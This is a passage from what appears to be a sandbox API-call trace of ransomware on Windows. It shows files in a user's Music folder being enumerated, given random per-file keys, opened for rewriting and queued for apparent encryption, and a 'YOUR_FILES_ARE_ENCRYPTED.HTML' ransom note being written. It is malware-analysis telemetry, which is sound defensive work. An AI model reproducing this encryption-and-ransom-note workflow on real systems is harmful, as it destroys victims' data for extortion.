out: param_1="F0") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="C6") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="76") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="6F") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B3") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="B7") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="A9") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="7C") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="22") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="4D") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="59") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="8A") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="5A") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="0C") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="A1") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AD") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="91") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="06") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="5B") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E4") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="16") returned 2 [0167.911] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a" [0167.911] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.911] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.915] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f682180, ftCreationTime.dwHighDateTime=0x1d7d732, ftLastAccessTime.dwLowDateTime=0x47c1bc0, ftLastAccessTime.dwHighDateTime=0x1d7df27, ftLastWriteTime.dwLowDateTime=0x47c1bc0, ftLastWriteTime.dwHighDateTime=0x1d7df27, nFileSizeHigh=0x0, nFileSizeLow=0x16420, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="oFvRRFIKLRJYqIY4pS.m4a", cAlternateFileName="OFVRRF~1.M4A")) returned 1 [0167.919] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a") returned 71 [0167.919] lstrcmpW (lpString1="oFvRRFIKLRJYqIY4pS.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.919] PathFindExtensionW (pszPath="oFvRRFIKLRJYqIY4pS.m4a") returned=".m4a" [0167.919] lstrlenW (lpString=".m4a") returned 4 [0167.919] PathFindExtensionW (pszPath="oFvRRFIKLRJYqIY4pS.m4a") returned=".m4a" [0167.919] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\ofvrrfiklrjyqiy4ps.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0167.919] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=91168) returned 1 [0167.920] GetProcessHeap () returned 0x270000 [0167.920] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.920] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="70") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="0B") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="CB") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="A1") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="E7") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="3F") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="11") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="DE") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="27") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="58") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="4C") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="0A") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="F1") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="A4") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="24") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="9F") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="41") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="5C") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="7A") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="B9") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="12") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="5D") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="22") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="7F") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="15") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="43") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="3B") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="A4") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="DA") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="5B") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="3F") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="2C") returned 2 [0167.922] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a" [0167.922] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.922] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.927] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x955fe200, ftCreationTime.dwHighDateTime=0x1d7e1b8, ftLastAccessTime.dwLowDateTime=0xd20cf490, ftLastAccessTime.dwHighDateTime=0x1d7e785, ftLastWriteTime.dwLowDateTime=0xd20cf490, ftLastWriteTime.dwHighDateTime=0x1d7e785, nFileSizeHigh=0x0, nFileSizeLow=0xe459, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="oYzTnBxoMCh.mp3", cAlternateFileName="OYZTNB~1.MP3")) returned 1 [0167.929] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3") returned 64 [0167.929] lstrcmpW (lpString1="oYzTnBxoMCh.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.930] PathFindExtensionW (pszPath="oYzTnBxoMCh.mp3") returned=".mp3" [0167.930] lstrlenW (lpString=".mp3") returned 4 [0167.930] PathFindExtensionW (pszPath="oYzTnBxoMCh.mp3") returned=".mp3" [0167.930] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\oyztnbxomch.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0167.931] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=58457) returned 1 [0167.931] GetProcessHeap () returned 0x270000 [0167.931] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.932] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="C1") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="99") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="48") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="37") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="97") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="C9") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="FD") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="46") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="CB") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="AE") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="9E") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="F1") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="31") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="77") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="6B") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="85") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="5A") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="F7") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="3A") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="48") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="19") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="82") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="8B") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="7C") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="0B") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="F3") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="F1") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="1B") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="D1") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="9C") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="36") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6D") returned 2 [0167.934] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3" [0167.934] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.934] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.958] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x955fe200, ftCreationTime.dwHighDateTime=0x1d7e1b8, ftLastAccessTime.dwLowDateTime=0xd20cf490, ftLastAccessTime.dwHighDateTime=0x1d7e785, ftLastWriteTime.dwLowDateTime=0xd20cf490, ftLastWriteTime.dwHighDateTime=0x1d7e785, nFileSizeHigh=0x0, nFileSizeLow=0xe459, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="oYzTnBxoMCh.mp3", cAlternateFileName="OYZTNB~1.MP3")) returned 0 [0167.958] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0167.958] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0167.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0167.959] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0167.961] CloseHandle (hObject=0x5a4) returned 1 [0167.961] GetProcessHeap () returned 0x270000 [0167.962] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76302f8 | out: hHeap=0x270000) returned 1 [0167.964] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a49390, ftCreationTime.dwHighDateTime=0x1d7dd48, ftLastAccessTime.dwLowDateTime=0x4268f5b0, ftLastAccessTime.dwHighDateTime=0x1d7de6f, ftLastWriteTime.dwLowDateTime=0x4268f5b0, ftLastWriteTime.dwHighDateTime=0x1d7de6f, nFileSizeHigh=0x0, nFileSizeLow=0x15e57, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="enJfnYk gyfr.mp3", cAlternateFileName="ENJFNY~1.MP3")) returned 1 [0167.964] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3") returned 55 [0167.964] lstrcmpW (lpString1="enJfnYk gyfr.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.964] PathFindExtensionW (pszPath="enJfnYk gyfr.mp3") returned=".mp3" [0167.964] lstrlenW (lpString=".mp3") returned 4 [0167.964] PathFindExtensionW (pszPath="enJfnYk gyfr.mp3") returned=".mp3" [0167.964] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\enjfnyk gyfr.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.965] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=89687) returned 1 [0167.965] GetProcessHeap () returned 0x270000 [0167.965] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.965] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="4C") returned 2 [0167.965] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="6F") returned 2 [0167.965] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="FE") returned 2 [0167.965] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F6") returned 2 [0167.965] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="59") returned 2 [0167.965] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="9A") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="A2") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="11") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="94") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="C4") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="F3") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="C5") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7F") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0F") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B7") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="24") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="11") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D9") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="EE") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="0B") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="BF") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="68") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F9") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="05") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="9A") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="0F") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="52") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="0E") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="2B") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="09") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="3C") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2F") returned 2 [0167.967] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3" [0167.967] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.967] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.970] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2b585a0, ftCreationTime.dwHighDateTime=0x1d7e58d, ftLastAccessTime.dwLowDateTime=0x75e0e890, ftLastAccessTime.dwHighDateTime=0x1d7e5ee, ftLastWriteTime.dwLowDateTime=0x75e0e890, ftLastWriteTime.dwHighDateTime=0x1d7e5ee, nFileSizeHigh=0x0, nFileSizeLow=0x15e8c, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="gh-g.m4a", cAlternateFileName="")) returned 1 [0167.981] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a") returned 47 [0167.982] lstrcmpW (lpString1="gh-g.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.982] PathFindExtensionW (pszPath="gh-g.m4a") returned=".m4a" [0167.982] lstrlenW (lpString=".m4a") returned 4 [0167.982] PathFindExtensionW (pszPath="gh-g.m4a") returned=".m4a" [0167.982] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\gh-g.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.982] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=89740) returned 1 [0167.983] GetProcessHeap () returned 0x270000 [0167.983] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.987] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="F5") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="43") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="79") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="A2") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="73") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="19") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F6") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="75") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="9C") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="02") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="34") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="F4") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7E") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="B9") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="A7") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F9") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3B") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="21") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="4F") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="7C") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="C0") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="02") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A1") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="43") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="65") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="5D") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="65") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="3E") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C0") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="86") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="53") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1A") returned 2 [0167.989] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a" [0167.989] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.989] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.999] FindNextFileW 